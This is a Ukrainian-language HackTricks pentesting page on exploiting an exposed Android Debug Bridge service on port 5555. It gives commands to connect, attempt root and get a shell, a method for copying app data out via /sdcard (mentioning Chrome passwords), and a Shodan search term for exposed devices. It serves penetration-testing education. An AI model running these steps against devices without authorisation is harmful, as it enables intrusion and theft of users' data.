4.8 KiB
5555 - Android Debug Bridge
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
З документації:
Android Debug Bridge (adb) — це універсальний інструмент командного рядка, який дозволяє вам спілкуватися з пристроєм. Команда adb полегшує різноманітні дії з пристроєм, такі як встановлення та налагодження додатків, і надає доступ до оболонки Unix, яку ви можете використовувати для виконання різноманітних команд на пристрої.
Порт за замовчуванням: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Connect
Якщо ви знайдете службу ADB, що працює на порту пристрою, і зможете підключитися до неї, ви зможете отримати оболонку всередині системи:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Для отримання додаткових команд ADB перегляньте наступну сторінку:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Вивантаження даних програми
Щоб повністю завантажити дані програми, ви можете:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Ви можете використовувати цей трюк, щоб отримати чутливу інформацію, таку як паролі chrome. Для отримання додаткової інформації про це перевірте інформацію в посиланнях, наданих тут.
Shodan
android debug bridge
{% hint style="success" %}
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримати HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.